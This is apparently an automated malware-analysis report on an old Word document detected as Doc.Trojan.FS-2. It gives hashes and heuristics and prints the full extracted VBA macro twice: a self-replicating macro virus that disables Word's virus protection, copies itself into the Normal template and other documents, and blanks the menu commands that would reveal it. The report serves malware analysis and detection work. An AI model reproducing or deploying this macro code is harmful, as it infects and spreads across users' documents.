Office (OLE) malware analysis — malicious · bdc1aacb4dfdb464

MALICIOUS

Office (OLE)

29.0 KB Created: 1999-01-28 18:03:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: d21b3e0bf669e5da31d2095f4cc23e53 SHA-1: f6871a06a9a5a8a3a8186aac38843b8698db16dc SHA-256: bdc1aacb4dfdb4641578ea6e85e50d47aa23159e8e0c5bcd24bc1e4f4815fc7f

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The sample is identified as malicious by ClamAV with the signature Doc.Trojan.FS-2. It contains VBA macros within a file created in 1999, suggesting an older, potentially custom, malicious document. The macro code attempts to disable virus protection and screen updating, and manipulate document saving behavior, likely to evade detection or establish persistence. No direct IOCs like URLs or file paths were extracted from the script.

Heuristics 2

ClamAV: Doc.Trojan.FS-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.FS-2
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1512 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	1512 bytes
SHA-256: `91e32bf8827552d0f4a54c7ad14d8f65a29e3a95937e82719011600937d9826c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Vacuity" 'Copyright (C) 1998 by FlyShadow ~^^~ - Vacuity Sub ο() On Error Resume Next υ = ActiveDocument.Saved Options.VirusProtection = Val("0") Options.SaveNormalPrompt = Val("0") Application.DisplayAlerts = Val("0") Application.ScreenUpdating = Val("0") Application.EnableCancelKey = Val("0") For ι = 1 To ActiveDocument.VBProject.VBComponents.Count If ActiveDocument.VBProject.VBComponents(ι).Name Like "Vacuity" <> False Then λ = True Next: If λ = False Then If ActiveDocument.Path <> "" Then Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument.FullName, "Vacuity", wdOrganizerObjectProjectItems: If υ <> False Then ActiveDocument.Save For ι = 1 To NormalTemplate.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents(ι).Name Like "Vacuity" <> False Then λ = False Next: If λ = True Then Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Vacuity", wdOrganizerObjectProjectItems ActiveDocument.Saved = υ End Sub Sub FileClose(): ο: ActiveDocument.Close: End Sub Sub DocClose(): ο: ActiveWindow.Close: End Sub Sub FileTemplates(): End Sub Sub FormatStyle(): End Sub Sub ToolsMacro(): End Sub Sub ViewVBCode(): End Sub Sub Organizer(): End Sub

SHA-256: 91e32bf8827552d0f4a54c7ad14d8f65a29e3a95937e82719011600937d9826c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Vacuity"
'Copyright (C) 1998 by FlyShadow ~^^~ - Vacuity
Sub ο()
On Error Resume Next
υ = ActiveDocument.Saved
Options.VirusProtection = Val("0")
Options.SaveNormalPrompt = Val("0")
Application.DisplayAlerts = Val("0")
Application.ScreenUpdating = Val("0")
Application.EnableCancelKey = Val("0")
For ι = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(ι).Name Like "Vacuity" <> False Then λ = True
Next: If λ = False Then If ActiveDocument.Path <> "" Then Application.OrganizerCopy NormalTemplate.FullName, ActiveDocument.FullName, "Vacuity", wdOrganizerObjectProjectItems: If υ <> False Then ActiveDocument.Save
For ι = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(ι).Name Like "Vacuity" <> False Then λ = False
Next: If λ = True Then Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Vacuity", wdOrganizerObjectProjectItems
ActiveDocument.Saved = υ
End Sub
Sub FileClose(): ο: ActiveDocument.Close: End Sub
Sub DocClose(): ο: ActiveWindow.Close: End Sub
Sub FileTemplates(): End Sub
Sub FormatStyle(): End Sub
Sub ToolsMacro(): End Sub
Sub ViewVBCode(): End Sub
Sub Organizer(): End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.